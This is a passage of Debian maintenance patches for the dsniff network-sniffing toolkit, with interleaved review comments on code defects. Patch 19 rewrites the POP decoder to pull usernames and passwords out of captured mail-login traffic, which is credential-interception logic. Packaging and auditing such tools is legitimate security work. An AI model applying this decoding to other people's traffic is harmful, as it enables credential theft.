malloc(ifaces_size); 63 | + sock = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); 64 | + if (sock <= 0) 65 | + return 0; 66 | + for (;;) { 67 | + param.ifc_len = ifaces_size; 68 | + param.ifc_req = *ifaces; 69 | + if (ioctl(sock, SIOCGIFCONF, ¶m)) 70 | + goto err; 71 | + if (param.ifc_len < ifaces_size) 72 | + break; 73 | + free(*ifaces); 74 | + ifaces_size *= 2; 75 | + ifaces = malloc(ifaces_size); 76 | + } 77 | + *count = param.ifc_len / sizeof(struct ifreq); 78 | + close(sock); 79 | + return 1; 80 | + err: 81 | + close(sock); 82 | + return 0; 83 | +} 84 | + 
85 | + 86 | + 87 | int 88 | main(int argc, char *argv[]) 89 | { 90 | @@ -189,6 +263,8 @@ 91 | warnx("using %s", nids_params.filename); 92 | } 93 | } 94 | + 95 | + all_local_ipaddrs_chksum_disable(); 96 | 97 | nids_run(); 98 | 99 | -------------------------------------------------------------------------------- /debian/patches/16_TDS_decoder.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: Fix for DOS y TDS decoder. Patch provided by Hilko Bengen. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=609988 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/decode_tds.c 8 | +++ b/decode_tds.c 9 | @@ -144,6 +144,11 @@ 10 | len > sizeof(*th) && len >= ntohs(th->size); 11 | buf += ntohs(th->size), len -= ntohs(th->size)) { 12 | 13 | + if (th->size != 8) { 14 | + /* wrong header length */ 15 | + break; 16 | + } 17 | + 18 | if (th->type == 2) { 19 | /* Version 4.x, 5.0 */ 20 | if (len < sizeof(*th) + sizeof(*tl)) 21 | -------------------------------------------------------------------------------- /debian/patches/17_checksum.patch: -------------------------------------------------------------------------------- 1 | Author: Piotr Engelking 2 | Description: Disable the filtering packets with incorrect checksum. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=372536 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -245,6 +245,7 @@ 10 | extern char *optarg; 11 | extern int optind; 12 | int c; 13 | + struct nids_chksum_ctl chksum_ctl; 14 | 15 | while ((c = getopt(argc, argv, "i:p:nvh?V")) != -1) { 16 | switch (c) { 17 | 
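Review bot: In get_all_ifaces() (15_checksum_libnids.patch, hunk @@ -70,6 +70,80 @@), the grow path assigns the new buffer to the parameter instead of through it: after `free(*ifaces);` the line `ifaces = malloc(ifaces_size);` changes only the local pointer, so the next pass hands ioctl() whatever pointer value the uninitialized allocation contains and the caller is left holding the freed buffer. It should be `*ifaces = malloc(ifaces_size);`, with both malloc results checked. In the same hunk, all_local_ipaddrs_chksum_disable() is declared int but has no return on the success path, `sock <= 0` treats descriptor 0 as a failure where socket() reports errors with -1, the early returns and the `err:` path leak the buffer, and get_addr_from_ifreq() is declared static but defined without it.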
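Review bot: In 16_TDS_decoder.patch (decode_tds.c, hunk @@ -144,6 +144,11 @@), the new test `if (th->size != 8)` reads the field raw, while the loop header around it always uses `ntohs(th->size)`; on a little-endian host the two disagree, so the check does not test the value the loop advances by. Compare in host order, and state the condition the loop depends on: `ntohs(th->size)` must be at least `sizeof(*th)`, because `buf += ntohs(th->size), len -= ntohs(th->size)` makes no progress when the size is 0. The comment says "wrong header length" while the field is used as the length to advance by; a sentence on why exactly 8 is expected would help.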
@@ -305,6 +306,12 @@ 18 | } 19 | } 20 | 21 | + chksum_ctl.netaddr = 0; 22 | + chksum_ctl.mask = 0; 23 | + chksum_ctl.action = NIDS_DONT_CHKSUM; 24 | + 25 | + nids_register_chksum_ctl(&chksum_ctl, 1); 26 | + 27 | nids_run(); 28 | 29 | /* NOTREACHED */ 30 | -------------------------------------------------------------------------------- /debian/patches/18_sshcrypto.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Missing openssl includes in sshcrypto.c. 3 | This patch was through diff.gz and now is implemented as a dpatch. 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/sshcrypto.c 8 | +++ b/sshcrypto.c 9 | @@ -14,6 +14,8 @@ 10 | 11 | #include 12 | #include 13 | +#include 14 | +#include 15 | 16 | #include 17 | #include 18 | -------------------------------------------------------------------------------- /debian/patches/19_rewrite-and-modernize-POP-decoder.patch: -------------------------------------------------------------------------------- 1 | >From b05e27ba9b0ba9ef00ad2183933652e08d8c89af Mon Sep 17 00:00:00 2001 2 | From: Stefan Tomanek 3 | Date: Sat, 29 Oct 2011 20:48:55 +0200 4 | Subject: [PATCH] rewrite and modernize POP decoder 5 | 6 | 7 | Signed-off-by: Stefan Tomanek 8 | --- 9 | decode_pop.c | 96 ++++++++++++++++++++++++++++++++++++++++++++++----------- 10 | 1 files changed, 77 insertions(+), 19 deletions(-) 11 | --- 12 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 13 | 14 | --- a/decode_pop.c 15 | +++ b/decode_pop.c 16 | @@ -6,6 +6,8 @@ 17 | * Copyright (c) 2000 Dug Song 18 | * 19 | * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 20 | + * 21 | + * Rewritten by Stefan Tomanek 2011 22 | */ 23 | 24 | #include "config.h" 25 | 
@@ -45,32 +47,88 @@ 26 | decode_pop(u_char *buf, int len, u_char *obuf, int olen) 27 | { 28 | char *p; 29 | + char *s; 30 | + int n; 31 | int i, j; 32 | + char *user; 33 | + char *password; 34 | + enum { 35 | + NONE, 36 | + AUTHPLAIN, 37 | + AUTHLOGIN, 38 | + USERPASS 39 | + } mode = NONE; 40 | + 41 | 42 | obuf[0] = '\0'; 43 | 44 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 45 | - if (strncasecmp(p, "AUTH PLAIN", 10) == 0 || 46 | - strncasecmp(p, "AUTH LOGIN", 10) == 0) { 47 | - strlcat(obuf, p, olen); 48 | - strlcat(obuf, "\n", olen); 49 | - 50 | - /* Decode SASL auth. */ 51 | - for (i = 0; i < 2 && (p = strtok(NULL, "\r\n")); i++) { 52 | - strlcat(obuf, p, olen); 53 | - j = base64_pton(p, p, strlen(p)); 54 | - p[j] = '\0'; 55 | - strlcat(obuf, " [", olen); 56 | - strlcat(obuf, p, olen); 57 | - strlcat(obuf, "]\n", olen); 58 | + if (mode == NONE) { 59 | + user = NULL; 60 | + password = NULL; 61 | + if (strncasecmp(p, "AUTH PLAIN", 10) == 0) { 62 | + mode = AUTHPLAIN; 63 | + continue; 64 | + } 65 | + if (strncasecmp(p, "AUTH LOGIN", 10) == 0) { 66 | + mode = AUTHLOGIN; 67 | + continue; 68 | + } 69 | + if (strncasecmp(p, "USER ", 5) == 0) { 70 | + mode = USERPASS; 71 | + /* the traditional login cuts right to the case, 72 | + * so no continue here 73 | + */ 74 | } 75 | } 76 | - /* Save regular POP2, POP3 auth info. 
*/ 77 | - else if (strncasecmp(p, "USER ", 5) == 0 || 78 | - strncasecmp(p, "PASS ", 5) == 0 || 79 | - strncasecmp(p, "HELO ", 5) == 0) { 80 | - strlcat(obuf, p, olen); 81 | - strlcat(obuf, "\n", olen); 82 | + printf("(%d) %s\n", mode, p); 83 | + if (mode == USERPASS) { 84 | + if (strncasecmp(p, "USER ", 5) == 0) { 85 | + user = &p[5]; 86 | + } else if (strncasecmp(p, "PASS ", 5) == 0) { 87 | + password = &p[5]; 88 | + } 89 | + } 90 | + 91 | + if (mode == AUTHPLAIN) { 92 | + j = base64_pton(p, p, strlen(p)); 93 | + p[j] = '\0'; 94 | + n = 0; 95 | + s = p; 96 | + /* p consists of three parts, divided by \0 */ 97 | + while (s <= &p[j] && n<=3) { 98 | + if (n == 0) { 99 | + /* we do not process this portion yet */ 100 | + } else if (n == 1) { 101 | + user = s; 102 | + } else if (n == 2) { 103 | + password = s; 104 | + } 105 | + n++; 106 | + while (*s) s++; 107 | + s++; 108 | + } 109 | + } 110 | + 111 | + if (mode == AUTHLOGIN) { 112 | + j = base64_pton(p, p, strlen(p)); 113 | + p[j] = '\0'; 114 | + if (! user) { 115 | + user = p; 116 | + } else { 117 | + password = p; 118 | + /* got everything we need :-) */ 119 | + } 120 | + } 121 | + 122 | + if (user && password) { 123 | + strlcat(obuf, "\nusername [", olen); 124 | + strlcat(obuf, user, olen); 125 | + strlcat(obuf, "] password [", olen); 126 | + strlcat(obuf, password, olen); 127 | + strlcat(obuf, "]\n", olen); 128 | + 129 | + mode = NONE; 130 | } 131 | } 132 | return (strlen(obuf)); 133 | -------------------------------------------------------------------------------- /debian/patches/20_debian_dirs.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Adapt to Debian directory structure. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/Makefile.in 7 | +++ b/Makefile.in 8 | 
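Review bot: In 19_rewrite-and-modernize-POP-decoder.patch (decode_pop.c, hunk @@ -45,32 +47,88 @@), the rewritten loop still contains `printf("(%d) %s\n", mode, p);`, which writes every line of the session to stdout, outside obuf; it looks like leftover debugging and should be removed. In the AUTHPLAIN and AUTHLOGIN branches the return value of base64_pton() is used as an index without a check (`p[j] = '\0';`), so if it returns a negative value for undecodable input the write lands before the start of the line; test `j < 0` first. `while (s <= &p[j] && n<=3)` allows one pass more than the three parts named in its comment, and the `HELO ` line that the removed code recorded is no longer captured, which matters if POP2 logins are still meant to be decoded.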
@@ -11,7 +11,7 @@ 9 | install_prefix = 10 | prefix = @prefix@ 11 | exec_prefix = @exec_prefix@ 12 | -libdir = @libdir@ 13 | +libdir = $(prefix)/share/dsniff 14 | sbindir = @sbindir@ 15 | mandir = @mandir@ 16 | 17 | @@ -37,8 +37,7 @@ 18 | X11INC = @X_CFLAGS@ 19 | X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ 20 | 21 | -INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \ 22 | - -I$(srcdir)/missing 23 | +INCS = -I. $(X11INC) -I$(srcdir)/missing 24 | LIBS = @LIBS@ -L$(srcdir) -lmissing 25 | 26 | INSTALL = @INSTALL@ 27 | --- a/dnsspoof.8 28 | +++ b/dnsspoof.8 29 | @@ -31,7 +31,7 @@ 30 | address queries on the LAN with an answer of the local machine's IP 31 | address. 32 | .SH FILES 33 | -.IP \fI/usr/local/lib/dnsspoof.hosts\fR 34 | +.IP \fI/usr/share/dsniff/dnsspoof.hosts\fR 35 | Sample hosts file. 36 | .SH "SEE ALSO" 37 | dsniff(8), hosts(5) 38 | --- a/dsniff.8 39 | +++ b/dsniff.8 40 | @@ -68,9 +68,9 @@ 41 | On a hangup signal \fBdsniff\fR will dump its current trigger table to 42 | \fIdsniff.services\fR. 43 | .SH FILES 44 | -.IP \fI/usr/local/lib/dsniff.services\fR 45 | +.IP \fI/usr/share/dsniff/dsniff.services\fR 46 | Default trigger table 47 | -.IP \fI/usr/local/lib/dsniff.magic\fR 48 | +.IP \fI/usr/share/dsniff/dsniff.magic\fR 49 | Network protocol magic 50 | .SH "SEE ALSO" 51 | arpspoof(8), libnids(3), services(5), magic(5) 52 | --- a/pathnames.h 53 | +++ b/pathnames.h 54 | 
@@ -12,7 +12,7 @@ 55 | #define PATHNAMES_H 56 | 57 | #ifndef DSNIFF_LIBDIR 58 | -#define DSNIFF_LIBDIR "/usr/local/lib/" 59 | +#define DSNIFF_LIBDIR "/usr/share/dsniff/" 60 | #endif 61 | 62 | #define DSNIFF_SERVICES "dsniff.services" 63 | -------------------------------------------------------------------------------- /debian/patches/21_msgsnarf_segfault.patch: -------------------------------------------------------------------------------- 1 | Author: 2 | Description: Correctly 0 out the c struct. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/msgsnarf.c 7 | +++ b/msgsnarf.c 8 | @@ -584,6 +584,7 @@ 9 | if (i == 0) { 10 | if ((c = malloc(sizeof(*c))) == NULL) 11 | nids_params.no_mem("sniff_msgs"); 12 | + memset(c, 0, sizeof(*c)); 13 | c->ip = ts->addr.saddr; 14 | c->nick = strdup("unknown"); 15 | SLIST_INSERT_HEAD(&client_list, c, next); 16 | -------------------------------------------------------------------------------- /debian/patches/22_handlepp.patch: -------------------------------------------------------------------------------- 1 | Author: Joerg Dorchain 2 | Description: Add tcpkill support for handle ppp interfaces. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/pcaputil.c 7 | +++ b/pcaputil.c 8 | @@ -52,6 +52,9 @@ 9 | case DLT_NULL: 10 | offset = 4; 11 | break; 12 | + case DLT_LINUX_SLL: /* e.g. ppp */ 13 | + offset = 16; 14 | + break; 15 | default: 16 | warnx("unsupported datalink type"); 17 | break; 18 | -------------------------------------------------------------------------------- /debian/patches/23_urlsnarf_timestamp.patch: -------------------------------------------------------------------------------- 1 | Author: Hilko Bengen 2 | Description: urlsnarf: use timestamps from pcap file if available. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573365 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | 
--- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -36,6 +36,7 @@ 10 | u_short Opt_dns = 1; 11 | int Opt_invert = 0; 12 | regex_t *pregex = NULL; 13 | +time_t tt = 0; 14 | 15 | static void 16 | usage(void) 17 | @@ -57,9 +58,12 @@ 18 | { 19 | static char tstr[32], sign; 20 | struct tm *t, gmt; 21 | - time_t tt = time(NULL); 22 | int days, hours, tz, len; 23 | 24 | + if (!nids_params.filename) { 25 | + tt = time(NULL); 26 | + } 27 | + 28 | gmt = *gmtime(&tt); 29 | t = localtime(&tt); 30 | 31 | 
@@ -312,9 +316,48 @@ 32 | 33 | nids_register_chksum_ctl(&chksum_ctl, 1); 34 | 35 | - nids_run(); 36 | - 37 | - /* NOTREACHED */ 38 | + pcap_t *p; 39 | + char pcap_errbuf[PCAP_ERRBUF_SIZE]; 40 | + if (nids_params.filename == NULL) { 41 | + /* adapted from libnids.c:open_live() */ 42 | + if (strcmp(nids_params.device, "all") == 0) 43 | + nids_params.device = "any"; 44 | + p = pcap_open_live(nids_params.device, 16384, 45 | + (nids_params.promisc != 0), 46 | + 0, pcap_errbuf); 47 | + if (!p) { 48 | + fprintf(stderr, "pcap_open_live(): %s\n", 49 | + pcap_errbuf); 50 | + exit(1); 51 | + } 52 | + } 53 | + else { 54 | + p = pcap_open_offline(nids_params.filename, 55 | + pcap_errbuf); 56 | + if (!p) { 57 | + fprintf(stderr, "pcap_open_offline(%s): %s\n", 58 | + nids_params.filename, pcap_errbuf); 59 | + } 60 | + } 61 | + 62 | + struct pcap_pkthdr *h; 63 | + u_char *d; 64 | + int rc; 65 | + while ((rc = pcap_next_ex(p, &h, &d)) == 1) { 66 | + tt = h->ts.tv_sec; 67 | + nids_pcap_handler(NULL, h, d); 68 | + } 69 | + switch (rc) { 70 | + case(-2): /* end of pcap file */ 71 | + case(0): /* timeout on live capture */ 72 | + break; 73 | + case(-1): 74 | + default: 75 | + fprintf(stderr, "rc = %i\n", rc); 76 | + pcap_perror(p, "pcap_read_ex()"); 77 | + exit(1); 78 | + break; 79 | + } 80 | 81 | exit(0); 82 | } 83 | -------------------------------------------------------------------------------- /debian/patches/25_fix-spelling-errors.patch: -------------------------------------------------------------------------------- 1 | Description: Fix minor spelling error in source code 2 | Author: Marcos Fouces 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | 7 | --- a/remote.c 8 | +++ b/remote.c 9 | 
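Review bot: In 23_urlsnarf_timestamp.patch, the main() hunk at @@ -312,9 +316,48 @@ reports a failed `pcap_open_offline()` but keeps going, so `pcap_next_ex(p, &h, &d)` is then called with p == NULL; the live branch calls `exit(1)` in the same situation and the offline branch should too. Smaller points: the error label says `pcap_read_ex()` although the call is pcap_next_ex(), `d` is declared `u_char *` where pcap_next_ex() takes a `const u_char **`, and a return of 0 (the timeout case named in the comment) ends the live capture instead of continuing the loop.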
@@ -652,7 +652,7 @@ 10 | if (remote_command_count > 0) 11 | { 12 | fprintf (stderr, 13 | - "%s: the `-id' option must preceed all `-remote' options.\n", 14 | + "%s: the `-id' option must precede all `-remote' options.\n", 15 | progname); 16 | usage (); 17 | exit (-1); 18 | -------------------------------------------------------------------------------- /debian/patches/30_pntohl_shift.patch: -------------------------------------------------------------------------------- 1 | Description: Corrects the incorrect bit-shift in pntohl(), the left-shift should be 8 bits, not 18. 2 | Author: Matthew Boyle 3 | Origin: http://pkgs.fedoraproject.org/cgit/rpms/dsniff.git/tree/dsniff-2.4-pntohl_shift.patch 4 | Bug-RedHat: https://bugzilla.redhat.com/show_bug.cgi?id=714958 5 | Bug-RedHat: https://bugzilla.redhat.com/show_bug.cgi?id=850496 6 | --- 7 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 8 | 9 | --- a/decode.h 10 | +++ b/decode.h 11 | @@ -35,7 +35,7 @@ 12 | (u_short)*((u_char *)p+0)<<8)) 13 | 14 | #define pntohl(p) ((u_int32_t)*((u_char *)p+3)<<0| \ 15 | - (u_int32_t)*((u_char *)p+2)<<18| \ 16 | + (u_int32_t)*((u_char *)p+2)<<8| \ 17 | (u_int32_t)*((u_char *)p+1)<<16| \ 18 | (u_int32_t)*((u_char *)p+0)<<24) 19 | 20 | -------------------------------------------------------------------------------- /debian/patches/31_sysconf_clocks.patch: -------------------------------------------------------------------------------- 1 | Description: Adds a clock fix. It was improved by Robert Scheck 2 | to work with older Linux kernel versions, too. 3 | Author: 4 | Origin: http://pkgs.fedoraproject.org/cgit/rpms/dsniff.git/tree/dsniff-2.4-sysconf_clocks.patch 5 | --- 6 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 7 | 8 | --- a/sshow.c 9 | +++ b/sshow.c 10 | 
@@ -217,7 +217,9 @@ 11 | { 12 | clock_t delay; 13 | int payload; 14 | - long CLK_TCK= sysconf(_SC_CLK_TCK); 15 | +#if defined(_SC_CLK_TCK) 16 | + long CLK_TCK = sysconf(_SC_CLK_TCK); 17 | +#endif 18 | 19 | delay = add_history(session, 0, cipher_size, plain_range); 20 | 21 | @@ -266,7 +268,9 @@ 22 | clock_t delay; 23 | int skip; 24 | range string_range; 25 | - long CLK_TCK= sysconf(_SC_CLK_TCK); 26 | +#if defined(_SC_CLK_TCK) 27 | + long CLK_TCK = sysconf(_SC_CLK_TCK); 28 | +#endif 29 | 30 | delay = add_history(session, 1, cipher_size, plain_range); 31 | 32 | -------------------------------------------------------------------------------- /debian/patches/32_rpc_segfault.patch: -------------------------------------------------------------------------------- 1 | Description: avoids xdrs being used without being initialised first. Without this 2 | patch dsniff segfaults when decoding RPC packets on x86_64. 3 | Author: Matthew Boyle 4 | Origin: http://pkgs.fedoraproject.org/cgit/rpms/dsniff.git/tree/dsniff-2.4-rpc_segfault.patch 5 | --- 6 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 7 | 8 | --- a/rpc.c 9 | +++ b/rpc.c 10 | @@ -125,6 +125,9 @@ 11 | return (0); 12 | } 13 | } 14 | + else 15 | + return (0); 16 | + 17 | stat = xdr_getpos(&xdrs); 18 | xdr_destroy(&xdrs); 19 | 20 | -------------------------------------------------------------------------------- /debian/patches/33_sshcrypto_DES.patch: -------------------------------------------------------------------------------- 1 | Description: improves 18_sshcrypto.patch 2 | - Replace all des_ methods and structs with DES_ equivalents. 3 | - Remove openssl/des_old.h include. 4 | - Register dependencies on OpenSSL, glib20 and gettext. 5 | Author: jca 6 | Origin: OpenBSD 7 | --- 8 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 9 | 10 | --- a/sshcrypto.c 11 | +++ b/sshcrypto.c 12 | 
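Review bot: in the sshow.c hunk at @@ -217,7 +217,9 @@ (and the identical change at @@ -266,7 +268,9 @@), the guard has no `#else`, so when `_SC_CLK_TCK` is undefined nothing in this function declares `CLK_TCK` and any use of it depends on a macro coming from a header. Add a comment or an `#else` with `#error` to make that dependency explicit. The `sysconf()` result is also stored without checking for -1.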
@@ -30,8 +30,8 @@ 13 | 14 | #if 0 15 | struct des3_state { 16 | - des_key_schedule k1, k2, k3; 17 | - des_cblock iv1, iv2, iv3; 18 | + DES_key_schedule k1, k2, k3; 19 | + DES_cblock iv1, iv2, iv3; 20 | }; 21 | #endif 22 | 23 | @@ -162,13 +162,13 @@ 24 | if ((state = malloc(sizeof(*state))) == NULL) 25 | err(1, "malloc"); 26 | 27 | - des_set_key((void *)sesskey, state->k1); 28 | - des_set_key((void *)(sesskey + 8), state->k2); 29 | + DES_set_key((void *)sesskey, &state->k1); 30 | + DES_set_key((void *)(sesskey + 8), &state->k2); 31 | 32 | if (len <= 16) 33 | - des_set_key((void *)sesskey, state->k3); 34 | + DES_set_key((void *)sesskey, &state->k3); 35 | else 36 | - des_set_key((void *)(sesskey + 16), state->k3); 37 | + DES_set_key((void *)(sesskey + 16), &state->k3); 38 | 39 | memset(state->iv1, 0, 8); 40 | memset(state->iv2, 0, 8); 41 | @@ -184,9 +184,9 @@ 42 | estate = (struct des3_state *)state; 43 | memcpy(estate->iv1, estate->iv2, 8); 44 | 45 | - des_ncbc_encrypt(src, dst, len, estate->k1, &estate->iv1, DES_ENCRYPT); 46 | - des_ncbc_encrypt(dst, dst, len, estate->k2, &estate->iv2, DES_DECRYPT); 47 | - des_ncbc_encrypt(dst, dst, len, estate->k3, &estate->iv3, DES_ENCRYPT); 48 | + DES_ncbc_encrypt(src, dst, len, &estate->k1, &estate->iv1, DES_ENCRYPT); 49 | + DES_ncbc_encrypt(dst, dst, len, &estate->k2, &estate->iv2, DES_DECRYPT); 50 | + DES_ncbc_encrypt(dst, dst, len, &estate->k3, &estate->iv3, DES_ENCRYPT); 51 | } 52 | 53 | void 54 | 
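Review bot: in the sshcrypto.c hunk at @@ -162,13 +162,13 @@, every `DES_set_key()` call discards its int return value and passes the key through a `(void *)` cast, which hides any type mismatch from the compiler. Cast to `(const_DES_cblock *)` instead, and either check the result or call `DES_set_key_unchecked()` so that skipping the key checks is a visible decision. The first hunk of this patch edits a struct that sits inside `#if 0`, so it is worth confirming which of these changes are actually compiled.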
@@ -197,8 +197,8 @@ 55 | dstate = (struct des3_state *)state; 56 | memcpy(dstate->iv1, dstate->iv2, 8); 57 | 58 | - des_ncbc_encrypt(src, dst, len, dstate->k3, &dstate->iv3, DES_DECRYPT); 59 | - des_ncbc_encrypt(dst, dst, len, dstate->k2, &dstate->iv2, DES_ENCRYPT); 60 | - des_ncbc_encrypt(dst, dst, len, dstate->k1, &dstate->iv1, DES_DECRYPT); 61 | + DES_ncbc_encrypt(src, dst, len, &dstate->k3, &dstate->iv3, DES_DECRYPT); 62 | + DES_ncbc_encrypt(dst, dst, len, &dstate->k2, &dstate->iv2, DES_ENCRYPT); 63 | + DES_ncbc_encrypt(dst, dst, len, &dstate->k1, &dstate->iv1, DES_DECRYPT); 64 | } 65 | #endif 66 | -------------------------------------------------------------------------------- /debian/patches/34_fix-parallel-FTBFS.patch: -------------------------------------------------------------------------------- 1 | Description: Fix parallel FTBFS problems 2 | * Add libmissing.a as a dependency to each of the PROGS to ensure it is 3 | built before them. 4 | * Ensure mount.h is created before decode_mountd.o gets built. 5 | * Ensure nfs_prot.h is created before filesnarf.o gets built. 6 | Author: Lukas Schwaighofer 7 | Author: Adrian Bunk 8 | Bug-Debian: https://bugs.debian.org/860611 9 | Bug-Debian: https://bugs.debian.org/869086 10 | 11 | --- a/Makefile.in 12 | +++ b/Makefile.in 13 | @@ -75,16 +75,28 @@ 14 | .c.o: 15 | $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/$*.c 16 | 17 | -all: libmissing.a $(PROGS) 18 | +all: $(PROGS) 19 | 20 | -mount.c: mount.x 21 | +mount.h: mount.x 22 | rpcgen -h mount.x -o mount.h 23 | + 24 | +mount.c: mount.x 25 | rpcgen -c mount.x -o mount.c 26 | 27 | -nfs_prot.c: nfs_prot.x 28 | +mount.o: mount.h 29 | + 30 | +decode_mountd.o: mount.h 31 | + 32 | +nfs_prot.h: nfs_prot.x 33 | rpcgen -h nfs_prot.x -o nfs_prot.h 34 | + 35 | +nfs_prot.c: nfs_prot.x 36 | rpcgen -c nfs_prot.x -o nfs_prot.c 37 | 38 | +nfs_prot.o: nfs_prot.h 39 | + 40 | +filesnarf.o: nfs_prot.h 41 | + 42 | $(LIBOBJS): 43 | $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 44 | 45 | 
@@ -92,49 +104,49 @@ 46 | ar -cr $@ $(LIBOBJS) 47 | $(RANLIB) $@ 48 | 49 | -dsniff: $(HDRS) $(SRCS) $(OBJS) 50 | +dsniff: $(HDRS) $(SRCS) $(OBJS) libmissing.a 51 | $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) 52 | 53 | -arpspoof: arpspoof.o arp.o 54 | +arpspoof: arpspoof.o arp.o libmissing.a 55 | $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(LIBS) $(PCAPLIB) $(LNETLIB) 56 | 57 | -dnsspoof: dnsspoof.o pcaputil.o 58 | +dnsspoof: dnsspoof.o pcaputil.o libmissing.a 59 | $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 60 | 61 | -filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o 62 | +filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o libmissing.a 63 | $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 64 | 65 | -macof: macof.o 66 | +macof: macof.o libmissing.a 67 | $(CC) $(LDFLAGS) -o $@ macof.o $(LIBS) $(PCAPLIB) $(LNETLIB) 68 | 69 | -mailsnarf: mailsnarf.o buf.o pcaputil.o 70 | +mailsnarf: mailsnarf.o buf.o pcaputil.o libmissing.a 71 | $(CC) $(LDFLAGS) -o $@ mailsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 72 | 73 | -msgsnarf: msgsnarf.o buf.o pcaputil.o 74 | +msgsnarf: msgsnarf.o buf.o pcaputil.o libmissing.a 75 | $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 76 | 77 | -sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o 78 | +sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o libmissing.a 79 | $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 80 | 81 | -sshow: sshow.o pcaputil.o 82 | +sshow: sshow.o pcaputil.o libmissing.a 83 | $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 84 | 85 | -tcpkill: tcpkill.o pcaputil.o 86 | +tcpkill: tcpkill.o pcaputil.o libmissing.a 87 | $(CC) $(LDFLAGS) -o $@ tcpkill.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 88 | 89 | -tcpnice: tcpnice.o 
pcaputil.o 90 | +tcpnice: tcpnice.o pcaputil.o libmissing.a 91 | $(CC) $(LDFLAGS) -o $@ tcpnice.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 92 | 93 | -tcphijack: tcphijack.o pcaputil.o 94 | +tcphijack: tcphijack.o pcaputil.o libmissing.a 95 | $(CC) $(LDFLAGS) -o $@ tcphijack.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 96 | 97 | -urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o 98 | +urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o libmissing.a 99 | $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 100 | 101 | -webmitm: webmitm.o base64.o buf.o decode_http.o record.o 102 | +webmitm: webmitm.o base64.o buf.o decode_http.o record.o libmissing.a 103 | $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 104 | 105 | -webspy: webspy.o base64.o buf.o remote.o 106 | +webspy: webspy.o base64.o buf.o remote.o libmissing.a 107 | $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) 108 | 109 | install: 110 | -------------------------------------------------------------------------------- /debian/patches/35_Add_CPPFLAGS.patch: -------------------------------------------------------------------------------- 1 | Description: import CPPFLAGS in order to build an ELF binary that uses fortified libc functions. Now it is built with all default Debian compiler flags. 2 | Author: Marcos Fouces 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/Makefile.in 7 | +++ b/Makefile.in 8 | @@ -11,12 +11,13 @@ 9 | install_prefix = 10 | prefix = @prefix@ 11 | exec_prefix = @exec_prefix@ 12 | -libdir = $(prefix)/share/dsniff 13 | +libdir = @libdir@ 14 | sbindir = @sbindir@ 15 | mandir = @mandir@ 16 | 17 | CC = @CC@ 18 